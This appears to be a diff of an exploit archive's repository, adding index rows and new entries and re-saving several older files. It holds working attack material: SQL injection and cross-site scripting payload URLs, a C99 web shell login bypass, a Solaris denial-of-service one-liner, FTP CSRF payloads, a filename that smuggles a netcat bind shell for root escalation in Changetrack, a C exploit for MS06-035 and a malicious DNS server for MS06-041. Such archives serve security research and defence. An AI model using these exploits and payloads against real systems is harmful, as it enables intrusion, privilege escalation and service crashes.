+33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0
+33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0
 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
 33895,platforms/cgi/webapps/33895.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"BGA Security",cgi,webapps,20001
 33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
@@ -30640,3 +30639,11 @@ id,file,description,date,author,platform,type,port
 34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
 34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
 34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection Vulnerability",2010-05-20,SH4V,hardware,remote,0
+34021,platforms/php/webapps/34021.txt,"Joomla! 'com_horses' Component 'id' Parameter SQL Injection Vulnerability",2010-05-19,"Kernel Security Group",php,webapps,0
+34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 'demo.php' Cross Site Scripting Vulnerability",2010-01-13,PaL-D3v1L,php,webapps,0
+34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
+34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
+34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
+34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
+34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
+34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0

platforms/generator/shellcode/13287.txt

@@ -1,19 +0,0 @@
-Download & Exec polymorphed shellcode engine POC
-This downloading and execution code is not detectable by popular AVs.
-Greetz 2:
-DarkEagle and Unl0ck researcherz;
-Str0ke and milw0rm;
-HD Moor and metasploit project;
-Maxus, Fuchunic, YrSam, Garry;
-Offtopic and PTT team;
----
-10X 2:
-Batched for shellcode papperz;
-Flat assembler project for best'n'fast compiler
----
-Phrase of day:
-In code we fast ;D ;D ;D
-
-http://www.exploit-db.com/sploits/01242007-shell.tar.gz
-
-# milw0rm.com [2007-01-24]

platforms/linux/local/9709.txt

@@ -1,57 +1,57 @@
-TITLE:
-Changetrack Privilege Escalation Vulnerability
-
-SECUNIA ADVISORY ID:
-SA36756
-
-VERIFY ADVISORY:
-http://secunia.com/advisories/36756/
-
-DESCRIPTION:
-A vulnerability has been discovered in Changetrack, which can be
-exploited by malicious, local users to gain escalated privileges.
-
-The application does not properly escape certain file names, which
-can be exploited to inject and execute arbitrary shell commands
-(potentially with "root" privileges) by creating a maliciously named
-file in a directory tracked by Changetrack.
-
-Successful exploitation requires write privileges to a directory
-scanned by Changetrack.
-
-SOLUTION:
-Use Changetrack to track trusted directories only.
-
-PROVIDED AND/OR DISCOVERED BY:
-Marek Grzybowski
-
-
---------------------------------------------------------------------------------
-Example of exploitation:
-
------------- Attacker ----------
-
-rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
-rick@testmachine:~/testt$ ls
-<`nc -l -p 5001 -e $SHELL`
-
---------------------------------
-
-
------------- root --------------
-
-testmachine:~# changetrack 
-
------------- root --------------
-
-
-
------------- Attacker ----------
-
-rick@testmachine:~/testt$ nc 127.0.0.1 5001
-id
-uid=0(root) gid=0(root) groups=0(root)
-
---------------------------------
-
-# milw0rm.com [2009-09-17]
+TITLE:
+Changetrack Privilege Escalation Vulnerability
+
+SECUNIA ADVISORY ID:
+SA36756
+
+VERIFY ADVISORY:
+http://secunia.com/advisories/36756/
+
+DESCRIPTION:
+A vulnerability has been discovered in Changetrack, which can be
+exploited by malicious, local users to gain escalated privileges.
+
+The application does not properly escape certain file names, which
+can be exploited to inject and execute arbitrary shell commands
+(potentially with "root" privileges) by creating a maliciously named
+file in a directory tracked by Changetrack.
+
+Successful exploitation requires write privileges to a directory
+scanned by Changetrack.
+
+SOLUTION:
+Use Changetrack to track trusted directories only.
+
+PROVIDED AND/OR DISCOVERED BY:
+Marek Grzybowski
+
+
+--------------------------------------------------------------------------------
+Example of exploitation:
+
+------------ Attacker ----------
+
+rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
+rick@testmachine:~/testt$ ls
+<`nc -l -p 5001 -e $SHELL`
+
+--------------------------------
+
+
+------------ root --------------
+
+testmachine:~# changetrack 
+
+------------ root --------------
+
+
+
+------------ Attacker ----------
+
+rick@testmachine:~/testt$ nc 127.0.0.1 5001
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+--------------------------------
+
+# milw0rm.com [2009-09-17]

platforms/php/webapps/34021.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40308/info
+
+The 'com_horses' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6-- 

platforms/php/webapps/34022.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40310/info
+
+Stiva SHOPPING CART is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Stiva SHOPPING CART 1.0 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 

platforms/php/webapps/34023.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/40314/info
+
+Lisk CMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Lisk CMS 4.4 is vulnerable; other versions may also be affected. 
+
+The following example URIs are available:
+
+http://www.example.com/path_to_cp/list_content.php?cl=2%27%22%3E%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
+http://www.example.com/path_to_cp/edit_email.php?&id=contact_form_214%27+--+%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
+http://www.example.com/path_to_cp/cp_messages.php?action=view_inbox&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+
+http://www.example.com/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+ 

platforms/php/webapps/34024.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40316/info
+
+Triburom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/forum.php?action=liste&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 

platforms/php/webapps/34025.txt

@@ -0,0 +1,37 @@
+# Exploit Title: C99 Shell Authentication Bypass via Backdoor
+# Google Dork: inurl:c99.php
+# Date: June 23, 2014
+# Exploit Author: mandatory ( Matthew Bryant )
+# Vendor Homepage: http://ccteam.ru/
+# Software Link: https://www.google.com/
+# Version: < 1.00 beta
+# Tested on:Linux 
+# CVE: N/A
+
+All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. 
+
+e.g. http://127.0.0.1/c99.php?c99shcook[login]=0
+
+The backdoor:
+@extract($_REQUEST["c99shcook"]);
+
+Which bypasses the authentication here:
+if ($login) {
+    if (empty($md5_pass)) {
+        $md5_pass = md5($pass);
+    }
+    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
+        if ($login_txt === false) {
+            $login_txt = "";
+        } elseif (empty($login_txt)) {
+            $login_txt = strip_tags(ereg_replace("&nbsp;|<br>", " ", $donated_html));
+        }
+        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
+        header("HTTP/1.0 401 Unauthorized");
+        exit($accessdeniedmess);
+    }
+}
+
+For more info: http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/
+
+~mandatory

platforms/php/webapps/34029.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/40324/info
+
+Specialized Data Systems Parent Connect is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Parent Connect 2010.4.11 is vulnerable; other versions may also be affected. 
+
+The following example data is available:
+
+password: ' OR '1'='1 

platforms/solaris/dos/34027.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40319/info
+
+Sun Solaris is prone to a local denial-of-service vulnerability.
+
+Exploiting this issue allows local users to cause denial-of-service conditions in certain filesystem commands.
+
+Sun Solaris 10 is affected, other versions may also be vulnerable. 
+
+perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }' 

platforms/solaris/dos/34028.txt

@@ -0,0 +1,166 @@
+source: http://www.securityfocus.com/bid/40320/info
+
+Sun Solaris 'in.ftpd' FTP server is prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.
+
+An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site. This may lead to further attacks.
+
+Sun Solaris 10 10/09 and OpenSolaris 2009.06 are vulnerable; other versions may be affected.
+
+<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
+
+ftp://ftp.sun.com//////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////stat
+
+or
+
+ftp://ftp.sun.com//////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////pwd
+
+tested od firefox 3.6.3
+
+Example 2 (2048):
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+//////////////////pwd
+
+will be split for:
+
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+//////////////////
+
+and
+
+pwd
+
+Example 3:
+ftp://192.168.11.143///////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////
+//////////////////////////////////////site chmod 777 .

platforms/windows/dos/2057.c

@@ -1,130 +1,130 @@
-#include <stdio.h>
-#include <windows.h>
-#include <winsock.h>
-
-/*******************************************************************
-Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
-
-by cocoruder(frankruder_at_hotmail.com),2006.7.19
-page:http://ruder.cdut.net
-*******************************************************************/
-
-
-unsigned char SmbNeg[] =
-"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
-"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
-
-unsigned char Session_Setup_AndX_Request[]=
-"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
-"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
-"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
-"\x62\x00";
-
-unsigned char TreeConnect_AndX_Request[]=
-"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
-"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
-"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
-"\x3f\x00";
-
-unsigned char Trans_Request[]=
-"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
-"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
-"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
-"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";
-
-
-unsigned char recvbuff[2048];
-
-
-
-
-
-void neg ( int s )
-{
-char response[1024];
-
-memset(response,0,sizeof(response));
-
-send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
-}
-
-void main(int argc,char **argv)
-{
-struct sockaddr_in server;
-SOCKET sock;
-DWORD ret;
-WSADATA ws;
-
-WORD userid,treeid;
-
-
-WSAStartup(MAKEWORD(2,2),&ws);
-
-sock = socket(AF_INET,SOCK_STREAM,0);
-if(sock<=0)
-{
-return;
-}
-
-server.sin_family = AF_INET;
-server.sin_addr.s_addr = inet_addr(argv[1]);
-server.sin_port = htons((USHORT)atoi(argv[2]));
-
-ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
-if (ret==-1)
-{
-printf("connect error!\n");
-return;
-}
-
-neg(sock);
-
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
-if (ret<=0)
-{
-printf("send Session_Setup_AndX_Request error!\n");
-return;
-}
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-userid=*(WORD *)(recvbuff+0x20); //get userid
-
-
-memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
-
-
-ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
-if (ret<=0)
-{
-printf("send TreeConnect_AndX_Request error!\n");
-return;
-}
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-treeid=*(WORD *)(recvbuff+0x1c); //get treeid
-
-memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
-memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid
-
-ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
-if (ret<=0)
-{
-printf("send Trans_Request error!\n");
-return;
-}
-recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-}
-
-// milw0rm.com [2006-07-21]
+#include <stdio.h>
+#include <windows.h>
+#include <winsock.h>
+
+/*******************************************************************
+Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
+
+by cocoruder(frankruder_at_hotmail.com),2006.7.19
+page:http://ruder.cdut.net
+*******************************************************************/
+
+
+unsigned char SmbNeg[] =
+"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
+"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
+
+unsigned char Session_Setup_AndX_Request[]=
+"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
+"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
+"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
+"\x62\x00";
+
+unsigned char TreeConnect_AndX_Request[]=
+"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
+"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
+"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
+"\x3f\x00";
+
+unsigned char Trans_Request[]=
+"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
+"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
+"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
+"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";
+
+
+unsigned char recvbuff[2048];
+
+
+
+
+
+void neg ( int s )
+{
+char response[1024];
+
+memset(response,0,sizeof(response));
+
+send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
+}
+
+void main(int argc,char **argv)
+{
+struct sockaddr_in server;
+SOCKET sock;
+DWORD ret;
+WSADATA ws;
+
+WORD userid,treeid;
+
+
+WSAStartup(MAKEWORD(2,2),&ws);
+
+sock = socket(AF_INET,SOCK_STREAM,0);
+if(sock<=0)
+{
+return;
+}
+
+server.sin_family = AF_INET;
+server.sin_addr.s_addr = inet_addr(argv[1]);
+server.sin_port = htons((USHORT)atoi(argv[2]));
+
+ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
+if (ret==-1)
+{
+printf("connect error!\n");
+return;
+}
+
+neg(sock);
+
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
+if (ret<=0)
+{
+printf("send Session_Setup_AndX_Request error!\n");
+return;
+}
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+userid=*(WORD *)(recvbuff+0x20); //get userid
+
+
+memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
+
+
+ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
+if (ret<=0)
+{
+printf("send TreeConnect_AndX_Request error!\n");
+return;
+}
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+treeid=*(WORD *)(recvbuff+0x1c); //get treeid
+
+memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
+memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid
+
+ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
+if (ret<=0)
+{
+printf("send Trans_Request error!\n");
+return;
+}
+recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+}
+
+// milw0rm.com [2006-07-21]

platforms/windows/dos/2900.py

@@ -1,92 +1,92 @@
-#!/usr/bin/python
-#POC for MS06-041
-#Run the python script passing the local ip address as parameter. The DNS server
-#will start listening on this ip address for DNS hostname resolution queries.
-#This script is for testing and educational purpose and so to test this one will
-#have to point the DNS resolver on the target/client to the ip address on which
-#this script runs.
-#Open up internet explorer and type in a hostname. services.exe will crash.
-#You may have to repeat this two or three times to see the crash in services.exe
-# Tested on Windows 2000 server SP0 and SP1  inside VmWare. Could not
-# reproduce on SP4 though it is also vulnerable. May be I missed something :)
-#
-# For testing/educational purpose. Author shall bear no responsibility for any screw ups
-# Winny Thomas ;-)
-
-import sys
-import struct
-import socket
-
-class DNSserver:
-       def __init__(self, localhost):
-               self.response = ''
-               self.__create_socket(localhost)
-
-       def __create_socket(self, localhost):
-               self.host = localhost
-               self.port = 53
-               self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-               self.DNSsocket.bind((self.host, self.port))
-               print 'Awaiting DNS queries'
-               print '====================\n'
-               while 1:
-                       self.__await_query()
-
-       def __await_query(self):
-               self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
-               print 'Query from: ' + str(self.Addr)
-               self.TransactID = self.Query[0:2]
-               self.__find_type(self.Query[2:])
-
-       def __find_type(self, Question):
-               qType = struct.unpack('>H', Question[0:2])
-               if qType[0] == 256:
-                       self.__send_response(Question[10:-4])
-
-       def __send_response(self, sName):
-               self.response = self.TransactID
-               self.response += '\x85\x80' #Flags
-               self.response += '\x00\x01' #Questions
-               self.response += '\x00\x02' #Answer RR's
-               self.response += '\x00\x01' #Authority RR
-               self.response += '\x00\x00' #Additional RR
-
-               #QUERIES
-               #self.response += sName
-               self.response += '\x04\x74\x65\x73\x74\x07\x68\x61\x63\x6b\x65'
-               self.response += '\x72\x73\x03\x63\x6f\x6d\x00'
-               self.response += '\x00\xff' #request all  records
-               self.response += '\x00\x01' #inet class
-
-               #ANSWERS
-               #A record
-               self.response += '\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x07'
-               self.response += '\x00\x04\xc0\xa8\x00\x02' #A type record (IP add)
-               #TXT record
-               self.response += '\xc0\x0c\x00\x10\x00\x01\x00\x00\x00\x07'
-               self.response += '\x00\x18' #TXT record length
-               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
-               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
-               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x01\x41'
-
-               #Authoritative Nameservers
-               self.response += '\xc0\x11\x00\x02\x00\x01\x00\x01\x51\x80'
-               self.response += '\x00\x0b\x08\x73\x63\x6f\x72\x70\x69\x6f'
-               self.response += '\x6e\xc0\x11'
-
-               self.DNSsocket.sendto(self.response, (self.Addr))
-
-if __name__ == '__main__':
-       try:
-               localhost = sys.argv[1]
-       except IndexError:
-               print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
-               sys.exit(-1)
-
-       D = DNSserver(localhost)
-
-# milw0rm.com [2006-12-09]
+#!/usr/bin/python
+#POC for MS06-041
+#Run the python script passing the local ip address as parameter. The DNS server
+#will start listening on this ip address for DNS hostname resolution queries.
+#This script is for testing and educational purpose and so to test this one will
+#have to point the DNS resolver on the target/client to the ip address on which
+#this script runs.
+#Open up internet explorer and type in a hostname. services.exe will crash.
+#You may have to repeat this two or three times to see the crash in services.exe
+# Tested on Windows 2000 server SP0 and SP1  inside VmWare. Could not
+# reproduce on SP4 though it is also vulnerable. May be I missed something :)
+#
+# For testing/educational purpose. Author shall bear no responsibility for any screw ups
+# Winny Thomas ;-)
+
+import sys
+import struct
+import socket
+
+class DNSserver:
+       def __init__(self, localhost):
+               self.response = ''
